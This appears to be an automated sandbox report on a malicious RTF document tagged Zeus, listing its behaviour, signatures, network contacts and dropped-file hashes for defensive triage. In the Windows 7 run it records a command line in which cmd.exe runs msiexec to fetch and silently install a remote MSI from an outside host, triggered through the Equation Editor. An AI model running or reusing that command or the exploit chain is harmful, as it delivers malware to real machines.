Malware Analysis Report

2025-01-22 12:13

Sample ID 241212-gr8yhaxkdq
Target e507b370764f67144cc781a69981e965_JaffaCakes118
SHA256 33456b620018dd5f68a6a536804f3da03e87eaf66c356f2b4f8d4d82ddc8866a
Tags
zeus discovery
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

33456b620018dd5f68a6a536804f3da03e87eaf66c356f2b4f8d4d82ddc8866a

Threat Level: Known bad

The file e507b370764f67144cc781a69981e965_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

zeus discovery

Zeus

Zeus family

Use of msiexec (install) with remote resource

Blocklisted process makes network request

Drops file in Windows directory

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Launches Equation Editor

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-12 06:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-12 06:03

Reported

2024-12-12 14:48

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e507b370764f67144cc781a69981e965_JaffaCakes118.rtf"

Signatures

Zeus

zeus

Zeus family

zeus

Use of msiexec (install) with remote resource

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2008 wrote to memory of 2500 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 2500 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 2500 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 2500 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 1708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe
PID 2500 wrote to memory of 1708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe
PID 2500 wrote to memory of 1708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe
PID 2500 wrote to memory of 1708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe
PID 2500 wrote to memory of 1708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe
PID 2500 wrote to memory of 1708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe
PID 2500 wrote to memory of 1708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe
PID 2348 wrote to memory of 1904 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2348 wrote to memory of 1904 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2348 wrote to memory of 1904 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2348 wrote to memory of 1904 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e507b370764f67144cc781a69981e965_JaffaCakes118.rtf"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\cmd.exe

cmd.exe & /C CD C: & msiexec.exe /i https://a.doko.moe/ldbbxq.msi /quiet

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /i https://a.doko.moe/ldbbxq.msi /quiet

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
US 8.8.8.8:53 a.doko.moe udp
US 172.234.222.138:443 a.doko.moe tcp
US 172.234.222.138:443 a.doko.moe tcp

Files

memory/2348-0-0x000000002F7F1000-0x000000002F7F2000-memory.dmp

memory/2348-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2348-2-0x00000000716BD000-0x00000000716C8000-memory.dmp

memory/2348-10-0x00000000716BD000-0x00000000716C8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-12 06:03

Reported

2024-12-12 14:48

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

141s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e507b370764f67144cc781a69981e965_JaffaCakes118.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e507b370764f67144cc781a69981e965_JaffaCakes118.rtf" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 92.123.26.202:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 202.26.123.92.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 143.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp

Files

memory/5048-0-0x00007FF7F2D90000-0x00007FF7F2DA0000-memory.dmp

memory/5048-1-0x00007FF832DAD000-0x00007FF832DAE000-memory.dmp

memory/5048-2-0x00007FF7F2D90000-0x00007FF7F2DA0000-memory.dmp

memory/5048-3-0x00007FF7F2D90000-0x00007FF7F2DA0000-memory.dmp

memory/5048-4-0x00007FF7F2D90000-0x00007FF7F2DA0000-memory.dmp

memory/5048-6-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-9-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-11-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-10-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-8-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-13-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-12-0x00007FF7F0530000-0x00007FF7F0540000-memory.dmp

memory/5048-15-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-18-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-21-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-22-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-20-0x00007FF7F0530000-0x00007FF7F0540000-memory.dmp

memory/5048-19-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-17-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-16-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-14-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-5-0x00007FF7F2D90000-0x00007FF7F2DA0000-memory.dmp

memory/5048-7-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-34-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-35-0x00007FF832DAD000-0x00007FF832DAE000-memory.dmp

memory/5048-36-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

memory/5048-37-0x00007FF832D10000-0x00007FF832F05000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 1f95c410690a78d53357e0b0e5743449
SHA1 eec2cebb4df5b85c74b5d4294dbbd3b3554c6978
SHA256 13d7f0abb5f978c56afde4dc2b1ddf3467e3e71edbb1e8105a52b70317904b55
SHA512 d3dd15a6c64e9f5c097596e06c2a0cbec019f04aed38dd6b10062932a589ec3a6e246d0fd9ca084ccca2737d9400856ded208e47c6d231de4af2aafd9a0d1d7c

C:\Users\Admin\AppData\Local\Temp\TCDDC3D.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e